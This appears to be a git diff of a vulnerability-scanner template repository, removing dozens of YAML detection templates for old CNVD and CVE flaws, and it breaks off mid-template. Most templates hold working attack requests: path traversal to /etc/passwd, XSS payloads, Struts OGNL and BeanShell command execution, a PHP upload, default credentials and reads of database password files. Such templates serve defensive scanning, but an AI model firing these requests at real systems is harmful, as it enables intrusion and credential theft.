|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 945 | daffainfo | 434 | cves | 951 | info | 979 | http | 2628 |
| lfi | 399 | dhiyaneshdk | 360 | vulnerabilities | 376 | high | 727 | file | 57 |
| panel | 377 | pikpikcu | 293 | exposed-panels | 375 | medium | 536 | network | 48 |
| xss | 294 | pdteam | 232 | technologies | 213 | critical | 339 | dns | 12 |
| wordpress | 277 | geeknik | 173 | exposures | 197 | low | 172 | | |
| exposure | 260 | dwisiswant0 | 159 | misconfiguration | 170 | | | | |
| rce | 247 | pussycat0x | 98 | token-spray | 146 | | | | |
| tech | 223 | gy741 | 93 | workflows | 86 | | | | |
| cve2021 | 207 | 0x_akoko | 91 | default-logins | 67 | | | | |
| wp-plugin | 187 | princechaddha | 81 | takeovers | 65 | | | | |
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|--------------|-------|----------------------|-------|----------|-------|------|-------|
| cve | 1805 | dhiyaneshdk | 815 | http | 5763 | info | 2830 | file | 118 |
| panel | 883 | dwisiswant0 | 794 | workflows | 190 | high | 1247 | dns | 18 |
| wordpress | 775 | daffainfo | 663 | file | 118 | medium | 1019 | | |
| wp-plugin | 666 | pikpikcu | 353 | network | 89 | critical | 671 | | |
| exposure | 661 | pdteam | 278 | dns | 18 | low | 215 | | |
| osint | 639 | pussycat0x | 237 | ssl | 11 | unknown | 26 | | |
| xss | 632 | geeknik | 220 | headless | 9 | | | | |
| tech | 602 | ricardomaia | 215 | cves.json | 1 | | | | |
| edb | 595 | ritikchaddha | 198 | contributors.json | 1 | | | | |
| lfi | 541 | 0x_akoko | 179 | TEMPLATES-STATS.json | 1 | | | | |

View File

@ -1,29 +0,0 @@
id: CNVD-2019-01348
info:
name: Xiuno BBS CNVD-2019-01348
author: princechaddha
severity: medium
description: The Xiuno BBS system has a system reinstallation vulnerability. The vulnerability stems from the failure to protect or filter the installation directory after the system is installed. Attackers can directly reinstall the system through the installation page.
reference: https://www.cnvd.org.cn/flaw/show/CNVD-2019-01348
tags: xiuno,cnvd,cnvd2019
requests:
- method: GET
path:
- "{{BaseURL}}/install/"
headers:
Accept-Encoding: deflate
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- "/view/js/xiuno.js"
- "Choose Language (选择语言)"
condition: and

View File

@ -1,27 +0,0 @@
id: CNVD-2019-06255
info:
name: CatfishCMS RCE
author: Lark-Lab
severity: medium
reference: http://112.124.31.29/%E6%BC%8F%E6%B4%9E%E5%BA%93/01-CMS%E6%BC%8F%E6%B4%9E/CatfishCMS/CNVD-2019-06255%20CatfishCMS%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C/
tags: rce,cnvd,catfishcms,cnvd2019
requests:
- method: GET
path:
- "{{BaseURL}}/s=set&_method=__construct&method=*&filter[]=system"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- 'OS'
- 'PATH'
- 'SHELL'
- 'USER'
condition: and

View File

@ -1,27 +0,0 @@
id: CNVD-2020-23735
info:
name: Xxunchi Local File read
author: princechaddha
severity: medium
description: Xunyou cms has an arbitrary file reading vulnerability. Attackers can use vulnerabilities to obtain sensitive information.
reference: https://www.cnvd.org.cn/flaw/show/2025171
tags: xunchi,lfi,cnvd,cnvd2020
requests:
- method: GET
path:
- "{{BaseURL}}/backup/auto.php?password=NzbwpQSdbY06Dngnoteo2wdgiekm7j4N&path=../backup/auto.php"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- "NzbwpQSdbY06Dngnoteo2wdgiekm7j4N"
- "display_errors"
condition: and

View File

@ -1,29 +0,0 @@
id: CNVD-2020-56167
info:
name: Ruijie Smartweb Default Password
author: pikpikcu
severity: low
reference: https://www.cnvd.org.cn/flaw/show/CNVD-2020-56167
tags: ruijie,default-login,cnvd,cnvd2020
requests:
- method: POST
path:
- "{{BaseURL}}/WEB_VMS/LEVEL15/"
headers:
Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
body: command=show basic-info dev&strurl=exec%04&mode=%02PRIV_EXEC&signname=Red-Giant.
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Level was: LEVEL15"
- "/WEB_VMS/LEVEL15/"
condition: and
- type: status
status:
- 200

View File

@ -1,31 +0,0 @@
id: CNVD-2020-62422
info:
name: Seeyon readfile(CNVD-2020-62422)
author: pikpikcu
severity: medium
reference: https://blog.csdn.net/m0_46257936/article/details/113150699
tags: lfi,cnvd,cnvd2020,seeyon
requests:
- method: GET
path:
- "{{BaseURL}}/seeyon/webmail.do?method=doDownloadAtt&filename=index.jsp&filePath=../conf/datasourceCtp.properties"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: header
words:
- "application/x-msdownload"
condition: and
- type: word
part: body
words:
- "ctpDataSource.password"
condition: and

View File

@ -1,42 +0,0 @@
id: CNVD-2020-68596
info:
name: WeiPHP 5.0 Path Traversal
author: pikpikcu
severity: critical
reference: http://wiki.peiqi.tech/PeiQi_Wiki/CMS%E6%BC%8F%E6%B4%9E/Weiphp/Weiphp5.0%20%E5%89%8D%E5%8F%B0%E6%96%87%E4%BB%B6%E4%BB%BB%E6%84%8F%E8%AF%BB%E5%8F%96%20CNVD-2020-68596.html
tags: weiphp,lfi,cnvd,cnvd2020
requests:
- raw:
- |
POST /public/index.php/material/Material/_download_imgage?media_id=1&picUrl=./../config/database.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
"1":1
- |
GET /public/index.php/home/file/user_pics HTTP/1.1
Host: {{Hostname}}
- |
GET {{endpoint}} HTTP/1.1
Host: {{Hostname}}
extractors:
- type: regex
name: endpoint
part: body
internal: true
regex:
- '/public/uploads/picture/(.*.jpg)'
matchers:
- type: word
part: body
words:
- https://weiphp.cn
- WeiPHP
- DB_PREFIX
condition: and

View File

@ -1,25 +0,0 @@
id: CNVD-2021-10543
info:
name: EEA Information Disclosure
author: pikpikcu
severity: high
reference: https://www.cnvd.org.cn/flaw/show/CNVD-2021-10543
tags: config,exposure,cnvd,cnvd2021
requests:
- method: GET
path:
- "{{BaseURL}}/authenticationserverservlet"
matchers-condition: and
matchers:
- type: regex
regex:
- "<username>(.*?)</username>"
- "<password>(.*?)</password>"
condition: and
- type: status
status:
- 200

View File

@ -1,25 +0,0 @@
id: CNVD-2021-15822
info:
name: ShopXO Download File Read
author: pikpikcu
severity: high
reference: https://mp.weixin.qq.com/s/69cDWCDoVXRhehqaHPgYog
tags: shopxo,lfi,cnvd,cnvd2021
requests:
- raw:
- |
GET /public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q= HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -1,28 +0,0 @@
id: CNVD-2021-17369
info:
name: Ruijie Smartweb Management System Password Information Disclosure
author: pikpikcu
severity: medium
reference: https://www.cnvd.org.cn/flaw/show/CNVD-2021-17369
tags: ruijie,disclosure,cnvd,cnvd2021
requests:
- method: GET
path:
- "{{BaseURL}}/web/xml/webuser-auth.xml"
headers:
Cookie: login=1; auth=Z3Vlc3Q6Z3Vlc3Q%3D; user=guest
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<userauth>"
- "<password>"
condition: and
- type: status
status:
- 200

View File

@ -1,43 +0,0 @@
id: CNVD-2021-30167
info:
name: UFIDA NC BeanShell Remote Code Execution
author: pikpikcu
severity: high
reference:
- https://mp.weixin.qq.com/s/FvqC1I_G14AEQNztU0zn8A
- https://www.cnvd.org.cn/webinfo/show/6491
tags: beanshell,rce,cnvd,cnvd2021
requests:
- raw:
- | #linux
POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
bsh.script=exec("id");
- | #windows
POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
bsh.script=exec("ipconfig");
matchers-condition: and
matchers:
- type: regex
regex:
- "uid="
- "Windows IP"
condition: or
- type: word
words:
- "BeanShell Test Servlet"
- type: status
status:
- 200

View File

@ -1,38 +0,0 @@
id: CNVD-2021-49104
info:
name: Pan Micro E-office File Uploads
author: pikpikcu
severity: critical
reference: https://chowdera.com/2021/12/202112200602130067.html
tags: pan,micro,cnvd,cnvd2021
requests:
- raw:
- |
POST /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId= HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4
--e64bdf16c554bbc109cecef6451c26a4
Content-Disposition: form-data; name="Filedata"; filename="{{randstr}}.php"
Content-Type: image/jpeg
<?php echo md5('CNVD-2021-49104');?>
--e64bdf16c554bbc109cecef6451c26a4--
- |
GET /images/logo/logo-eoffice.php HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- "94d01a2324ce38a2e29a629c54190f67"
- type: status
status:
- 200

1383
contributors.json Normal file

File diff suppressed because it is too large Load Diff

1745
cves.json Normal file

File diff suppressed because it is too large Load Diff

1
cves.json-checksum.txt Normal file
View File

@ -0,0 +1 @@
007505eab9adec1b628522c2675730ee

View File

@ -1,27 +0,0 @@
id: CVE-2000-0114
info:
name: Microsoft FrontPage Extensions Check (shtml.dll)
author: r3naissance
severity: low
description: Frontpage Server Extensions allows remote attackers to determine the name of the anonymous account via an RPC POST request to shtml.dll in the /_vti_bin/ virtual directory.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2000-0114
- https://www.exploit-db.com/exploits/19897
tags: cve,cve2000,frontpage,microsoft
requests:
- method: GET
path:
- '{{BaseURL}}/_vti_inf.html'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- "_vti_bin/shtml.dll"

View File

@ -1,26 +0,0 @@
id: CVE-2001-1473
info:
name: Deprecated SSHv1 Protocol Detection
author: iamthefrogy
severity: high
tags: network,ssh,openssh,cves,cves2001
description: SSHv1 is deprecated and has known cryptographic issues.
reference:
- https://www.kb.cert.org/vuls/id/684820
- https://nvd.nist.gov/vuln/detail/CVE-2001-1473
classification:
cvss-score: 7.4
cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
cve-id: CVE-2001-1473
cwe-id: CWE-310
network:
- host:
- "{{Hostname}}"
- "{{Host}}:22"
matchers:
- type: word
words:
- "SSH-1"

View File

@ -1,35 +0,0 @@
id: CVE-2002-1131
info:
name: SquirrelMail 1.2.6/1.2.7 - Multiple Cross-Site Scripting Vulnerabilities
author: dhiyaneshDk
severity: medium
description: The Virtual Keyboard plugin for SquirrelMail is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
reference: https://www.exploit-db.com/exploits/21811
tags: xss,squirrelmail,cve,cve2002
requests:
- method: GET
path:
- '{{BaseURL}}/src/addressbook.php?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
- '{{BaseURL}}/src/options.php?optpage=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
- '{{BaseURL}}/src/search.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&what=x&where=BODY&submit=Search'
- '{{BaseURL}}/src/search.php?mailbox=INBOX&what=x&where=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&submit=Search'
- '{{BaseURL}}/src/help.php?chapter=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
stop-at-first-match: true
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- "</script><script>alert(document.domain)</script>"
- type: word
part: header
words:
- "text/html"

View File

@ -1,30 +0,0 @@
id: CVE-2004-0519
info:
name: SquirrelMail 1.4.x - Folder Name Cross-Site Scripting
author: dhiyaneshDk
severity: medium
description: "Multiple cross-site scripting (XSS) vulnerabilities in SquirrelMail 1.4.2 allow remote attackers to execute arbitrary script as other users and possibly steal authentication information via multiple attack vectors, including the mailbox parameter in compose.php."
reference: https://www.exploit-db.com/exploits/24068
tags: xss,squirrelmail,cve2004,cve
requests:
- method: GET
path:
- '{{BaseURL}}/mail/src/compose.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- "</script><script>alert(document.domain)</script>"
- type: word
part: header
words:
- "text/html"

View File

@ -1,25 +0,0 @@
id: CVE-2005-2428
info:
name: CVE-2005-2428
author: CasperGN
severity: medium
tags: cve,cve2005
description: Lotus Domino R5 and R6 WebMail, with "Generate HTML for all fields" enabled, stores sensitive data from names.nsf in hidden form fields, which allows remote attackers to read the HTML source to obtain sensitive information such as (1) the password hash in the HTTPPassword field, (2) the password change date in the HTTPPasswordChangeDate field, (3) the client platform in the ClntPltfrm field, (4) the client machine name in the ClntMachine field, and (5) the client Lotus Domino release in the ClntBld field, a different vulnerability than CVE-2005-2696.
reference:
- http://www.cybsec.com/vuln/default_configuration_information_disclosure_lotus_domino.pdf
- https://www.exploit-db.com/exploits/39495
requests:
- method: GET
path:
- "{{BaseURL}}/names.nsf/People?OpenView"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
name: domino-username
regex:
- '(<a href\=\"/names\.nsf/[0-9a-z\/]+\?OpenDocument)'
part: body

View File

@ -1,26 +0,0 @@
id: CVE-2005-4385
info:
name: Cofax <= 2.0RC3 XSS
description: Cross-site scripting vulnerability in search.htm in Cofax 2.0 RC3 and earlier allows remote attackers to inject arbitrary web script or HTML via the searchstring parameter.
reference:
- http://pridels0.blogspot.com/2005/12/cofax-xss-vuln.html
- https://nvd.nist.gov/vuln/detail/CVE-2005-4385
author: geeknik
severity: medium
tags: cofax,xss,cve,cve2005
requests:
- method: GET
path:
- "{{BaseURL}}/search.htm?searchstring2=&searchstring=%27%3E%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- "'>\"</script><script>alert(document.domain)</script>"

View File

@ -1,30 +0,0 @@
id: CVE-2006-1681
info:
name: Cherokee HTTPD <=0.5 XSS
description: Cross-site scripting (XSS) vulnerability in Cherokee HTTPD 0.5 and earlier allows remote attackers to inject arbitrary web script or HTML via a malformed request that generates an HTTP 400 error, which is not properly handled when the error message is generated.
reference:
- https://www.securityfocus.com/bid/17408
- https://nvd.nist.gov/vuln/detail/CVE-2006-1681
author: geeknik
severity: medium
tags: cherokee,httpd,xss,cve,cve2006
requests:
- method: GET
path:
- "{{BaseURL}}/%2F..%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "</script><script>alert(document.domain)</script>"
- type: word
part: header
words:
- text/html

View File

@ -1,25 +0,0 @@
id: CVE-2006-2842
info:
name: Squirrelmail 1.4.x - 'Redirect.php' Local File Inclusion
author: dhiyaneshDk
severity: high
description: "PHP remote file inclusion vulnerability in functions/plugin.php in SquirrelMail 1.4.6 and earlier, if register_globals is enabled and magic_quotes_gpc is disabled, allows remote attackers to execute arbitrary PHP code via a URL in the plugins array parameter. NOTE: this issue has been disputed by third parties, who state that Squirrelmail provides prominent warnings to the administrator when register_globals is enabled. Since the varieties of administrator negligence are uncountable, perhaps this type of issue should not be included in CVE. However, the original developer has posted a security advisory, so there might be relevant real-world environments under which this vulnerability is applicable."
reference: https://www.exploit-db.com/exploits/27948
tags: cve2006,lfi,squirrelmail,cve
requests:
- method: GET
path:
- "{{BaseURL}}/src/redirect.php?plugins[]=../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200

View File

@ -1,29 +0,0 @@
id: CVE-2007-0885
info:
name: Rainbow.Zen Jira XSS
description: Cross-site scripting (XSS) vulnerability in jira/secure/BrowseProject.jspa in Rainbow with the Zen (Rainbow.Zen) extension allows remote attackers to inject arbitrary web script or HTML via the id parameter.
reference: https://www.securityfocus.com/archive/1/459590/100/0/threaded
author: geeknik
severity: medium
tags: cve,cve2007,jira,xss
requests:
- method: GET
path:
- '{{BaseURL}}/jira/secure/BrowseProject.jspa?id=%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3e'
matchers-condition: and
matchers:
- type: word
words:
- '"><script>alert(document.domain)</script>'
- type: status
status:
- 200
- type: word
part: header
words:
- "text/html"

View File

@ -1,27 +0,0 @@
id: CVE-2007-4504
info:
name: Joomla! Component RSfiles 1.0.2 - 'path' File Download
author: daffainfo
severity: high
description: Directory traversal vulnerability in index.php in the RSfiles component (com_rsfiles) 1.0.2 and earlier for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the path parameter in a files.display action.
reference:
- https://www.exploit-db.com/exploits/4307
- https://www.cvedetails.com/cve/CVE-2007-4504
tags: cve,cve2007,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_rsfiles&task=files.display&path=../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -1,30 +0,0 @@
id: CVE-2007-4556
info:
name: Apache Struts2 S2-001 RCE
author: pikpikcu
severity: critical
description: Struts support in OpenSymphony XWork before 1.2.3, and 2.x before 2.0.4, as used in WebWork and Apache Struts, recursively evaluates all input as an Object-Graph Navigation Language (OGNL) expression when altSyntax is enabled, which allows remote attackers to cause a denial of service (infinite loop) or execute arbitrary code via form input beginning with a "%{" sequence and ending with a "}" character.
reference: https://www.guildhab.top/?p=2326
tags: cve,cve2007,apache,rce,struts
requests:
- method: POST
path:
- "{{BaseURL}}/login.action"
headers:
Content-Type: application/x-www-form-urlencoded
body: |
username=test&password=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
part: body
- type: status
status:
- 200

View File

@ -1,32 +0,0 @@
id: CVE-2007-5728
info:
name: phpPgAdmin 4.1.1 - 'Redirect.php' Cross-Site Scripting
author: dhiyaneshDK
severity: medium
description: Cross-site scripting (XSS) vulnerability in phpPgAdmin 3.5 to 4.1.1, and possibly 4.1.2, allows remote attackers to inject arbitrary web script or HTML via certain input available in PHP_SELF in (1) redirect.php, possibly related to (2) login.php, different vectors than CVE-2007-2865.
tags: cve,cve2007,xss,pgadmin,phppgadmin
reference: https://www.exploit-db.com/exploits/30090
metadata:
shodan-query: 'http.title:"phpPgAdmin"'
requests:
- method: GET
path:
- '{{BaseURL}}/redirect.php/%22%3E%3Cscript%3Ealert(%22document.domain%22)%3C/script%3E?subject=server&server=test'
matchers-condition: and
matchers:
- type: word
words:
- '<script>alert("document.domain")</script>'
- type: status
status:
- 200
- type: word
part: header
words:
- "text/html"

View File

@ -1,29 +0,0 @@
id: CVE-2008-2398
info:
name: AppServ Open Project 2.5.10 and earlier XSS
author: unstabl3
severity: medium
description: Cross-site scripting (XSS) vulnerability in index.php in AppServ Open Project 2.5.10 and earlier allows remote attackers to inject arbitrary web script or HTML via the appservlang parameter.
reference: https://exchange.xforce.ibmcloud.com/vulnerabilities/42546
tags: cve,cve2008,xss
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?appservlang=%3Csvg%2Fonload=confirm%28%27xss%27%29%3E"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "<svg/onload=confirm('xss')>"
part: body
- type: word
words:
- "text/html"
part: header

View File

@ -1,25 +0,0 @@
id: CVE-2008-2650
info:
name: CMSimple 3.1 - Local File Inclusion
author: pussycat0x
severity: high
description: |
Directory traversal vulnerability in cmsimple/cms.php in CMSimple 3.1, when register_globals is enabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the sl parameter to index.php. NOTE: this can be leveraged for remote file execution by including adm.php and then invoking the upload action. NOTE: on 20080601, the vendor patched 3.1 without changing the version number.
reference: https://www.exploit-db.com/exploits/5700
tags: cve,cve2008,lfi
requests:
- raw:
- |
GET /index.php?sl=../../../../../../../etc/passwd%00 HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "root:.*:0:0:"
part: body

View File

@ -1,27 +0,0 @@
id: CVE-2008-4668
info:
name: Joomla! Component imagebrowser 0.1.5 rc2 - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Image Browser (com_imagebrowser) 0.1.5 component for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the folder parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/6618
- https://www.cvedetails.com/cve/CVE-2008-4668
tags: cve,cve2008,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_imagebrowser&folder=../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -1,27 +0,0 @@
id: CVE-2008-4764
info:
name: Joomla! Component com_extplorer 2.0.0 RC2 - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in the eXtplorer module (com_extplorer) 2.0.0 RC2 and earlier in Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the dir parameter in a show_error action.
reference:
- https://www.exploit-db.com/exploits/5435
- https://www.cvedetails.com/cve/CVE-2008-4764
tags: cve,cve2008,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_extplorer&action=show_error&dir=..%2F..%2F..%2F%2F..%2F..%2Fetc%2Fpasswd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -1,27 +0,0 @@
id: CVE-2008-5587
info:
name: phpPgAdmin 4.2.1 - '_language' Local File Inclusion
author: dhiyaneshDK
severity: medium
reference: https://www.exploit-db.com/exploits/7363
tags: cve2008,lfi,phppgadmin
metadata:
shodan-query: 'http.title:"phpPgAdmin"'
description: "Directory traversal vulnerability in libraries/lib.inc.php in phpPgAdmin 4.2.1 and earlier, when register_globals is enabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the _language parameter to index.php."
requests:
- method: GET
path:
- '{{BaseURL}}/phpPgAdmin/index.php?_language=../../../../../../../../etc/passwd%00'
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200

View File

@ -1,27 +0,0 @@
id: CVE-2008-6080
info:
name: Joomla! Component ionFiles 4.4.2 - File Disclosure
author: daffainfo
severity: high
description: Directory traversal vulnerability in download.php in the ionFiles (com_ionfiles) 4.4.2 component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
reference:
- https://www.exploit-db.com/exploits/6809
- https://www.cvedetails.com/cve/CVE-2008-6080
tags: cve,cve2008,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/components/com_ionfiles/download.php?file=../../../../../../../../etc/passwd&download=1"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -1,27 +0,0 @@
id: CVE-2008-6172
info:
name: Joomla! Component RWCards 3.0.11 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in captcha/captcha_image.php in the RWCards (com_rwcards) 3.0.11 component for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the img parameter.
reference:
- https://www.exploit-db.com/exploits/6817
- https://www.cvedetails.com/cve/CVE-2008-6172
tags: cve,cve2008,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/components/com_rwcards/captcha/captcha_image.php?img=../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -1,27 +0,0 @@
id: CVE-2008-6222
info:
name: Joomla! Component ProDesk 1.0/1.2 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Pro Desk Support Center (com_pro_desk) component 1.0 and 1.2 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the include_file parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/6980
- https://www.cvedetails.com/cve/CVE-2008-6222
tags: cve,cve2008,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_pro_desk&include_file=../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -1,27 +0,0 @@
id: CVE-2008-6668
info:
name: nweb2fax <= 0.2.7 Directory Traversal
description: Multiple directory traversal vulnerabilities in nweb2fax 0.2.7 and earlier allow remote attackers to read arbitrary files via .. in the id parameter to comm.php and var_filename parameter to viewrq.php.
reference:
- https://www.exploit-db.com/exploits/5856
- https://nvd.nist.gov/vuln/detail/CVE-2008-6668
author: geeknik
severity: high
tags: nweb2fax,lfi,cve,cve2008,traversal
requests:
- method: GET
path:
- "{{BaseURL}}/comm.php?id=../../../../../../../../../../etc/passwd"
- "{{BaseURL}}/viewrq.php?format=ps&var_filename=../../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
part: body
regex:
- "root:.*:0:0:"

View File

@ -1,20 +0,0 @@
id: CVE-2009-0545
info:
name: ZeroShell <= 1.0beta11 Remote Code Execution
author: geeknik
description: cgi-bin/kerbynet in ZeroShell 1.0beta11 and earlier allows remote attackers to execute arbitrary commands via shell metacharacters in the type parameter in a NoAuthREQ x509List action.
reference: https://www.exploit-db.com/exploits/8023
severity: critical
tags: cve,cve2009,zeroshell,kerbynet,rce
requests:
- method: GET
path:
- "{{BaseURL}}/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22"
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"

View File

@ -1,28 +0,0 @@
id: CVE-2009-0932
info:
name: Horde - Horde_Image::factory driver Argument LFI
author: pikpikcu
severity: high
description: |
Directory traversal vulnerability in framework/Image/Image.php in Horde before 3.2.4 and 3.3.3 and Horde Groupware before 1.1.5 allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the Horde_Image driver name.
reference:
- https://www.exploit-db.com/exploits/16154
- https://nvd.nist.gov/vuln/detail/CVE-2009-0932?cpeVersion=2.2
tags: cve,cve2009,horde,lfi,traversal
requests:
- method: GET
path:
- "{{BaseURL}}/horde/util/barcode.php?type=../../../../../../../../../../../etc/./passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -1,32 +0,0 @@
id: CVE-2009-1151
info:
name: PhpMyAdmin Scripts/setup.php Deserialization Vulnerability
author: princechaddha
severity: high
description: Setup script used to create PhpMyAdmin configurations can be fooled by using a crafted POST request to include arbitrary PHP code in the generated configuration file. Combined with the ability to save files on server, this can allow unauthenticated users to execute arbitrary PHP code.
reference:
- https://www.phpmyadmin.net/security/PMASA-2009-3/
- https://github.com/vulhub/vulhub/tree/master/phpmyadmin/WooYun-2016-199433
tags: cve,cve2009,phpmyadmin,rce,deserialization
requests:
- raw:
- |
POST /scripts/setup.php HTTP/1.1
Host: {{Hostname}}
Accept-Encoding: gzip, deflate
Accept: */*
Content-Type: application/x-www-form-urlencoded
action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "root:.*:0:0:"

View File

@ -1,27 +0,0 @@
id: CVE-2009-1496
info:
name: Joomla! Component Cmimarketplace - 'viewit' Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Cmi Marketplace (com_cmimarketplace) component 0.1 for Joomla! allows remote attackers to list arbitrary directories via a .. (dot dot) in the viewit parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/8367
- https://www.cvedetails.com/cve/CVE-2009-1496
tags: cve,cve2009,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_cmimarketplace&Itemid=70&viewit=/../../../../../../etc/passwd&cid=1"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -1,24 +0,0 @@
id: CVE-2009-1558
info:
name: Linksys WVC54GCA 1.00R22/1.00R24 (Wireless-G) - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in adm/file.cgi on the Cisco Linksys WVC54GCA wireless video camera with firmware 1.00R22 and 1.00R24 allows remote attackers to read arbitrary files via a %2e. (encoded dot dot) or an absolute pathname in the next_file parameter.
reference: https://www.exploit-db.com/exploits/32954
tags: cve,cve2009,iot,lfi,linksys,camera,cisco,firmware,traversal
requests:
- method: GET
path:
